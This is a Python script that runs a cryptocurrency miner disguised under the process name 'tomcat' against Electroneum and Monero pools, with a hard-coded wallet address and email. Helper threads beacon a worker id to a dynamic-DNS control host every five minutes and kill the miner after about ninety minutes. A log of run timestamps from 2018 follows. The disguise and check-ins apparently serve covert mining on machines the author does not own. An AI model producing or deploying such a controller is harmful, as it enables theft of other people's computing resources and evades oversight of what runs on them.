import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:07:07.613108
#2018-02-17 16:55:01.264782
#2018-02-17 18:43:06.615485
#2018-02-17 20:31:07.394878
#2018-02-17 22:17:03.334550
#2018-02-18 00:01:06.312088
#2018-02-18 01:53:01.731264
#2018-02-18 03:41:04.520370
#2018-02-18 05:28:03.794595
#2018-02-18 07:19:06.049959
#2018-02-18 09:07:05.898834
#2018-02-18 10:53:03.738718
#2018-02-18 12:40:08.208405
#2018-02-18 14:27:05.550903
#2018-02-18 16:17:05.874331
#2018-02-18 18:06:06.230603
#2018-02-18 19:52:04.866003
#2018-02-18 21:38:02.195021
#2018-02-18 23:26:01.817081
#2018-02-19 01:13:06.696320
#2018-02-19 02:59:07.468718
#2018-02-19 04:46:07.409387
#2018-02-19 06:29:03.625624
#2018-02-19 08:19:07.053735
#2018-02-19 10:08:07.160975
#2018-02-19 11:57:07.819174
#2018-02-19 13:44:04.413970
#2018-02-19 15:34:07.903281
#2018-02-19 17:22:01.873123
#2018-02-19 19:11:06.460878
#2018-02-19 20:57:07.532469
#2018-02-19 22:45:09.472899
#2018-02-20 00:29:01.793138
#2018-02-20 02:18:08.351615
#2018-02-20 04:10:10.405923
#2018-02-20 05:55:01.563225
#2018-02-20 07:41:01.714960
#2018-02-20 09:25:04.841981
#2018-02-20 11:09:06.029706
#2018-02-20 12:56:01.484050
#2018-02-20 14:42:06.083766
#2018-02-20 16:28:04.083110
#2018-02-20 18:17:04.294183
#2018-02-20 20:08:09.081997
#2018-02-20 21:54:07.996642
#2018-02-20 23:35:01.645267
#2018-02-21 01:19:04.877140
#2018-02-21 03:08:04.160483
#2018-02-21 04:56:01.738212
#2018-02-21 06:47:05.340425
#2018-02-21 08:34:01.593885
#2018-02-21 10:19:08.410897
#2018-02-21 12:06:08.672854
#2018-02-21 13:55:04.262592
#2018-02-21 15:40:07.903835
#2018-02-21 17:33:07.008192
#2018-02-21 19:19:10.201865
#2018-02-21 21:07:07.429149
#2018-02-21 22:55:01.691631
#2018-02-22 00:43:07.225574
#2018-02-22 02:31:07.098081
#2018-02-22 04:17:04.874798
#2018-02-22 06:04:05.254493
#2018-02-22 07:50:04.105595
#2018-02-22 09:39:06.167038
#2018-02-22 11:25:04.489178
#2018-02-22 13:10:10.774394
#2018-02-22 14:59:05.189483
#2018-02-22 16:44:04.795014
#2018-02-22 18:29:01.948178
#2018-02-22 20:23:07.492578
#2018-02-22 22:09:06.157676
#2018-02-22 23:56:06.211238
#2018-02-23 01:45:07.918265
#2018-02-23 03:36:08.587052
#2018-02-23 05:22:03.822829
#2018-02-23 07:07:07.725130
#2018-02-23 08:56:01.437799
#2018-02-23 11:13:08.157032
#2018-02-23 13:07:06.820615
#2018-02-23 14:53:05.038735
#2018-02-23 16:42:04.352358
#2018-02-23 18:28:05.627891
#2018-02-23 20:12:01.625192
#2018-02-23 22:01:08.216286
#2018-02-23 23:49:05.149908
#2018-02-24 01:36:08.420666
#2018-02-24 03:26:01.269898
#2018-02-24 05:12:04.532691
#2018-02-24 07:00:09.652642
#2018-02-24 08:51:01.458633
#2018-02-24 10:50:04.202903
#2018-02-24 12:37:05.008885
#2018-02-24 14:26:04.838560
#2018-02-24 16:14:07.811348
#2018-02-24 18:08:06.756272
#2018-02-24 19:54:05.513107
#2018-02-24 21:39:06.201170
#2018-02-25 00:29:04.955237
#2018-02-25 04:24:05.501124
#2018-02-25 07:56:07.283241